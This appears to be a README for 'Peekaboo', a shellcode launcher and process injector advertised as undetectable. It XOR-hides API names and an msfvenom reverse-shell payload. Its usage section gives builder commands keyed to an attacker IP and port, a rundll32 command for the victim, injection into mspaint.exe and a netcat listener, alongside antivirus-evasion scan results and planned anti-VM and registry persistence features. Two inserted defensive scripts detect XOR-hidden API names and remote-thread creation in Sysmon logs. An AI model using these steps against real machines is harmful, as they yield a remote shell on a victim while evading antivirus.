Peekaboo
Simple undetectable shellcode and code injector launcher example. Inspired by RTO malware development course.
Main logic
XOR encryption and decryption for the names of the Windows API functions the launcher calls and for the main payload (an msfvenom reverse shell as the example).
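Because the main logic above relies on XOR to hide API names and the payload, a defender-side illustration is useful: the example below (added here, not part of the Peekaboo repository) brute-forces every single-byte XOR key against a blob and reports at which key and offset well-known Windows API names reappear. It is the kind of triage check a YARA rule or a sandbox string scanner performs. The sample blob, the key 0x37 and the filler bytes are constructed for the example; a loader that uses a longer or rolling key would need a correspondingly wider search, which this example does not attempt.

```python
# Added example: recover XOR-hidden API names from a suspicious blob by
# trying all 256 single-byte keys. Not code from the Peekaboo project.

# API names a shellcode loader typically needs and often hides with XOR.
API_NAMES = [b"VirtualAlloc", b"CreateRemoteThread",
             b"WriteProcessMemory", b"LoadLibraryA"]


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR `data` with a repeating `key` (the same operation encodes and decodes)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def build_sample_blob(key: int = 0x37) -> bytes:
    """Constructed sample: the API names, separated by zero filler, XOR'd with one byte.
    Stands in for a blob carved out of a binary or a memory dump."""
    plain = b"\x00" * 8 + b"\x00".join(API_NAMES) + b"\x00" * 8
    return xor_bytes(plain, bytes([key]))


def find_xored_api_names(blob: bytes, names=API_NAMES):
    """Brute-force single-byte XOR keys.
    Returns {key: [(offset, api_name), ...]} for every key under which a
    known API name becomes readable. Key 0 covers plaintext occurrences."""
    hits = {}
    for key in range(256):
        decoded = xor_bytes(blob, bytes([key]))
        for name in names:
            off = decoded.find(name)
            while off != -1:
                hits.setdefault(key, []).append((off, name.decode()))
                off = decoded.find(name, off + 1)
    return hits


def recovered_names(hits):
    """Flatten the hit table into the set of API names recovered under any key."""
    return {name for matches in hits.values() for _, name in matches}


if __name__ == "__main__":
    table = find_xored_api_names(build_sample_blob())
    for key, matches in sorted(table.items()):
        print(f"key 0x{key:02x}: {matches}")
```

Run against a real sample, a single hit key with several API names at sensible offsets is a strong indicator that a string table was XOR-obfuscated; scattered single hits under many keys are noise from short names and should be weighted lower.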
Usage
1. DLL
on attacker machine
check your IP:
ip a
run python script with flags:
python3 peekaboo.py -l 192.168.56.1 -p 4444 --build 1
then on victim machine (windows 10 x64):
run on PowerShell or the cmd prompt:
rundll32 .\peekaboo.dll, lCiSdbvIAaeZLHFfkUhEcbOy
check on attacker machine:
check your netcat listener:
2. Injector
on attacker machine:
check attacker ip:
ip a
run python script on linux (for example, target process mspaint.exe):
python3 peekaboo.py -l 192.168.56.1 -p 4444 -e mspaint.exe --build 2
then on victim machine run (windows 10 x64):
.\peekaboo.exe
or double-click it (if built with the -m windows param)
check on attacker machine:
check your netcat listener:
3. NT API injector
run python script on linux (for example, target process mspaint.exe):
python3 peekaboo.py -l 192.168.56.1 -p 4444 -e mspaint.exe -m console --build 3
then on victim machine (windows 10 x64):
.\peekaboo.exe
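Both injector builds (2 and 3) end up creating a thread in another process, which is exactly what Sysmon records as Event ID 8 (CreateRemoteThread). The following triage script is an added example, not part of Peekaboo: it scores parsed EID 8 records, flagging threads that a non-system image starts in a different process, and raising the score when the thread's start address is not backed by any loaded module (StartModule empty), as is typical for shellcode written with VirtualAllocEx. The event records, the paths and the BENIGN_SOURCES list are constructed for the example; the field names follow Sysmon's EID 8 schema.

```python
# Added example: score Sysmon Event ID 8 (CreateRemoteThread) records.
# Not code from the Peekaboo project; input records are constructed.

# Constructed Sysmon records, already parsed into dicts (field names per Sysmon EID 8).
SAMPLE_EVENTS = [
    {"EventID": 8,
     "SourceImage": r"C:\Users\victim\Desktop\peekaboo.exe",
     "TargetImage": r"C:\Windows\System32\mspaint.exe",
     "StartAddress": "0x000001A2B3C40000",
     "StartModule": "",            # no module at the start address: unbacked memory
     "StartFunction": ""},
    {"EventID": 8,
     "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\explorer.exe",
     "StartAddress": "0x00007FF8A1B20000",
     "StartModule": r"C:\Windows\System32\ntdll.dll",
     "StartFunction": "RtlExitUserThread"},
    {"EventID": 1,                 # process creation, ignored by this triage
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
]

# Images that legitimately create threads in other processes on a healthy host.
# Assumption for this example; tune per environment.
BENIGN_SOURCES = {"csrss.exe", "wininit.exe", "services.exe", "svchost.exe"}


def image_name(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_remote_thread(ev: dict):
    """Return (severity, reasons) for one EID 8 record.
    high   : non-system source, thread starts in memory backed by no module
    medium : non-system source creating a thread in another process
    low    : source is a known system image
    """
    src = image_name(ev["SourceImage"])
    tgt = image_name(ev["TargetImage"])
    reasons = []
    if src in BENIGN_SOURCES:
        return "low", ["source image is a known system process"]
    if src != tgt:
        reasons.append(f"{src} created a thread in {tgt}")
    if not ev.get("StartModule"):
        reasons.append("start address is not backed by a loaded module")
        return "high", reasons
    return "medium", reasons


def triage(events):
    """Score every EID 8 record; returns [(source, target, severity, reasons)]."""
    out = []
    for ev in events:
        if ev.get("EventID") != 8:
            continue
        sev, why = score_remote_thread(ev)
        out.append((image_name(ev["SourceImage"]), image_name(ev["TargetImage"]), sev, why))
    return out


if __name__ == "__main__":
    for src, tgt, sev, why in triage(SAMPLE_EVENTS):
        print(f"[{sev}] {src} -> {tgt}: {'; '.join(why)}")
```

In a real deployment the records come from the Sysmon operational log (for instance via a SIEM export), and the allowlist is built from a baseline of the host's normal cross-process activity rather than hard-coded.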
Issues.
Tested on:
- Attacker machines: Kali Linux 2020.1, Windows 10 x64
- Victim machines: Windows 7 x64, Windows 10 x64
- Payload: windows x64 reverse shell from msfvenom
- AV Engines: Kaspersky, Windows Defender, Norton Antivirus Plus
VirusTotal results:
02 September 2021
30 December 2021 (NT API injector)
antiscan.me result:
11 January 2022 (NT API injector)
https://antiscan.me/scan/new/result?id=rQVfQhoFYgH9
TODO
- Compile the injector on Kali Linux
- XOR + AES (see the aes branch)
- Calling Windows API functions by hash names
- Find the Kernel32 base address via assembly
- One python builder
- Anti-VM tricks
- Persistence via Windows Registry run keys
- Replace the msfvenom shell with a donut payload?
Attention
This tool is a Proof of Concept and is for Educational Purposes Only!!! The author takes no responsibility for any damage you cause.